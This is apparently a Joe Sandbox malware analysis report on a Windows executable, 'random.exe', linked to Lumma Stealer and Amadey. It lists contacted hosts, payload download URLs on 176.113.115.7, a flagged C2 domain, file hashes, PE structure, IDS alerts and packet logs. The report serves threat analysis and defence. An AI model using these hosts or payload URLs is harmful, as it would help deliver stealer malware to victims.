https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.7/mine/ranK.$	random.exe, 00000000.00000003.1532235910.0000000001537000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535106970.000000000153C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.7/	random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.172.183	oreheatq.live	United States		13335	CLOUDFLARENETUS	false
176.113.115.7	unknown	Russian Federation		49505	SELECTELRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1651717
Start date and time:	2025-03-29 14:22:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	random.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/1@3/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 23.204.23.20
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target random.exe, PID 6160 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:23:16	API Interceptor	798x Sleep call for process: random.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.172.183	The_LauncherV1.exe	Get hash	malicious	LummaC Stealer	Browse
172.67.172.183	WeJUMzwLs1.exe	Get hash	malicious	NetSupport RAT, Amadey, LummaC Stealer	Browse
176.113.115.7	SUAosT64HD.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRAT	Browse	176.113.115.7/files/martin1/martin.zip
	BF7YWWbqVz.exe	Get hash	malicious	Amadey, CryptOne, LummaC Stealer, Stealc, Vidar	Browse	176.113.115.7/mine/random.exe
	FRCe39S0oE.exe	Get hash	malicious	Amadey	Browse	176.113.115.7/files/2043702969/PqFatgo.exe
	random.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	176.113.115.7/mine/random.exe
	6xdW3oRY63.exe	Get hash	malicious	Amadey, DarkVision Rat, LummaC Stealer, Vidar	Browse	176.113.115.7/mine/random.exe
	work.js	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	176.113.115.7/files/unique2/random.exe
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Xmrig	Browse	176.113.115.7/files/crazytimeya/random.exe
	random.exe	Get hash	malicious	Amadey	Browse	176.113.115.7/files/qqdoup/random.exe
	VSAXXKuhCu.exe	Get hash	malicious	Amadey, AsyncRAT	Browse	176.113.115.7/files/unique2/random.exe
	L0erlgyZ6f.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	176.113.115.7/files/qqdoup/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
oreheatq.live	BF7YWWbqVz.exe	Get hash	malicious	Amadey, CryptOne, LummaC Stealer, Stealc, Vidar	Browse	104.21.30.96
	The_LauncherV1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	SoftWare(2).exe	Get hash	malicious	Xmrig	Browse	104.21.30.96
	FusionLoader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.30.96
	LTool.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	104.21.30.96

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SELECTELRU	SUAosT64HD.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRAT	Browse	176.113.115.6
	BF7YWWbqVz.exe	Get hash	malicious	Amadey, CryptOne, LummaC Stealer, Stealc, Vidar	Browse	176.113.115.7
	Okami.arm4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
	Okami.ppc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
	Okami.arm5.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
	Okami.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
	Okami.m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
	Okami.sh4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
	Okami.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
	Okami.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.154.34.47
CLOUDFLARENETUS	http://34a.trimarypol.ru/BTzbeX4U/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	https://www.semfirms.com/goto?nid=294927&type=profile&url=https://mideastpipeline.com/%20%20%20%20%20001/009.html	Get hash	malicious	Unknown	Browse	172.67.158.129
	https://www.semfirms.com/goto?nid=294927&type=profile&url=https://mideastpipeline.com/%20%20%20%20%20001/009.html	Get hash	malicious	Unknown	Browse	104.21.33.35
	http://architrata.com	Get hash	malicious	Unknown	Browse	104.21.96.1
	grand-theft-auto-v-b_IrPDJhw7kN.exe	Get hash	malicious	Unknown	Browse	104.21.96.1
	nbtiapadkrtghja.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.80.1
	climb.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.80.1
	7ivgZ6j7.pdf	Get hash	malicious	Unknown	Browse	172.64.41.3
	N3BO TOOL.exe	Get hash	malicious	Unknown	Browse	104.22.69.199
	update.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.183.183

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	nbtiapadkrtghja.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	climb.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	update.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	Active_Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	SetUp.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	SetUp.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183
	Active_Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.172.183

Process:	C:\Users\user\Desktop\random.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	671902
Entropy (8bit):	7.9545244261297805
Encrypted:	false
SSDEEP:	12288:SxTAqVbfxfM25ZKzRFLQmEqiFssX7ZNg+mZK29/LQ7sKAocKkkSoJx720mjBp:SiqVWLXDiFJSd9/LQInkSOxq0GD
MD5:	A2C01329EFEBC07F1B1B019DDBBA0803
SHA1:	0ADA9EC48EE0B856E1E0060F9096D45D6F7CC30A
SHA-256:	9518AA25BC4686716D4C0DE8F987BAF7620631A7BE3597E68498F32CE07713FA
SHA-512:	67B3DF16575DA631C66DE9A2EA534C8D4A850FAC1724970BF0279E35A6F1D1C6E81213A2E9324E0A16BA0F183AB8EC454D7F806FB6FB82CB4376A56F8F48ADD5
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...)./.,..(...,../...,..)...,.......,...(...,...-...,...-.g.,.Y.%...,.Y.....,.Y.....,.Rich..,.........PE..L...#..g.............................0J...........@..........................`J.....!]....@.................................W...k.......D...................0.J...............................J..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..).........................@...vyhhgzxi.P....0..P..................@...okzpskpe..... J......>..............@....taggant.0...0J.."...B..............@...........................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.64453447756205
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	random.exe
File size:	3'014'144 bytes
MD5:	c6889665df5c7a04bacd10f52bf854de
SHA1:	df06bada819d70b38a0e798395bf85a98351f430
SHA256:	548da2333deaf3b2f072afa047dff707e86a3431b730c8a1228b8e50b70ddd0f
SHA512:	c16de243dd0addac5f2ffc448f4057aecc1dfea57ab2ce138a4e0c7aefda2464f4ee879dd07d785986b72e56314ec26c23913441d15196fadf70fbac8bc94d65
SSDEEP:	49152:70zKM4rrWmpuoJqttZxGjDn2oWpj/g7ICuJO9siYfR:7MIrrWsbJqtaDnMs7IpOWiYf
TLSH:	A5D56BE2F105F2DFD88A2A74956BCD42DE2D03B4472448C7AEAD70BE6D63CD016B5E24
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....T.g............................. 1...........@..........................P1......_....@.................................W...k..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x712000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67E75486 [Sat Mar 29 02:01:42 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F980D0DC11Ah
paddusb mm5, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x300	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x611f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x5f000	0x2e000	068ccd87612a87336c215a2167cac00a	False	0.9984714673913043	data	7.976556552628717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x300	0x200	dd81eb7f38e099ca1267ba2eb9c6a35d	False	0.869140625	data	6.472148577968705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x61000	0x1000	0x200	f47b289bcee0e13a937cc29db13607bf	False	0.150390625	data	1.0437720338377494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ykkdiuif	0x62000	0x2af000	0x2ae200	c095fc80f934ff92bf1a699563e778bd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ppaughip	0x311000	0x1000	0x600	9d7fc554eed74560988c5360ad159255	False	0.58203125	data	5.016521513503367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x312000	0x3000	0x2200	b636932bc61f6453343ba8966e7bf719	False	0.04974724264705882	DOS executable (COM)	0.4514009243903427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x30fd78	0x2a5	XML 1.0 document, ASCII text			0.4963072378138848

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-29T14:23:15.860119+0100	2061135	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (oreheatq .live)	1	192.168.2.7	55464	1.1.1.1	53	UDP
2025-03-29T14:23:16.235151+0100	2061136	ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI	1	192.168.2.7	49681	172.67.172.183	443	TCP
2025-03-29T14:23:16.235151+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49681	172.67.172.183	443	TCP
2025-03-29T14:23:17.889266+0100	2061136	ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI	1	192.168.2.7	49682	172.67.172.183	443	TCP
2025-03-29T14:23:17.889266+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49682	172.67.172.183	443	TCP
2025-03-29T14:23:19.072075+0100	2061136	ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI	1	192.168.2.7	49683	172.67.172.183	443	TCP
2025-03-29T14:23:19.072075+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49683	172.67.172.183	443	TCP
2025-03-29T14:23:19.999298+0100	2061136	ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI	1	192.168.2.7	49684	172.67.172.183	443	TCP
2025-03-29T14:23:19.999298+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49684	172.67.172.183	443	TCP
2025-03-29T14:23:21.725803+0100	2061136	ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI	1	192.168.2.7	49685	172.67.172.183	443	TCP
2025-03-29T14:23:21.725803+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49685	172.67.172.183	443	TCP
2025-03-29T14:23:23.054814+0100	2061136	ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI	1	192.168.2.7	49686	172.67.172.183	443	TCP
2025-03-29T14:23:23.054814+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49686	172.67.172.183	443	TCP
2025-03-29T14:23:24.951003+0100	2061136	ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI	1	192.168.2.7	49687	172.67.172.183	443	TCP
2025-03-29T14:23:24.951003+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49687	172.67.172.183	443	TCP

Network Port Distribution

Total Packets: 506
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2025 14:23:16.002604008 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.002644062 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.002723932 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.005763054 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.005776882 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.235058069 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.235151052 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.239463091 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.239470005 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.239757061 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.288563013 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.301723003 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.301743031 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.301827908 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.859994888 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860042095 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860064030 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860105038 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860148907 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860167027 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860172987 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.860187054 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860203981 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.860222101 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.860605001 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860635042 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860687971 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:16.860697031 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:16.860752106 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.146756887 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.146823883 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.146871090 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.146893024 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.146934986 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.146951914 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.146959066 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.146981955 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.146987915 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.147001028 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.147033930 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147082090 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147118092 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147134066 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.147140026 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147160053 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.147169113 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147206068 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.147212029 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147248030 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147308111 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147319078 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.147325039 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147352934 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.147377014 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.147428989 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.151320934 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.151340008 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.151348114 CET	49681	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.151352882 CET	443	49681	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.676438093 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.676476002 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.676589012 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.676929951 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.676942110 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.889189959 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.889266014 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.899919987 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.899961948 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.900268078 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:17.901710987 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.901849031 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:17.901885033 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:18.506994963 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:18.507110119 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:18.507194042 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:18.507503986 CET	49682	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:18.507524014 CET	443	49682	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:18.856374979 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:18.856416941 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:18.856517076 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:18.856878996 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:18.856892109 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.071980000 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.072074890 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.073338032 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.073345900 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.073673964 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.074857950 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.074981928 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.075026989 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.075097084 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.120269060 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.577472925 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.577661991 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.577748060 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.577857018 CET	49683	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.577877045 CET	443	49683	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.788851023 CET	49684	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.788887024 CET	443	49684	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.789280891 CET	49684	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.789280891 CET	49684	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:19.789319038 CET	443	49684	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.999164104 CET	443	49684	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:19.999298096 CET	49684	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:20.000745058 CET	49684	443	192.168.2.7	172.67.172.183
Mar 29, 2025 14:23:20.000751019 CET	443	49684	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:20.001038074 CET	443	49684	172.67.172.183	192.168.2.7
Mar 29, 2025 14:23:20.002243996 CET	49684	443	192.168.2.7	172.67.172.183
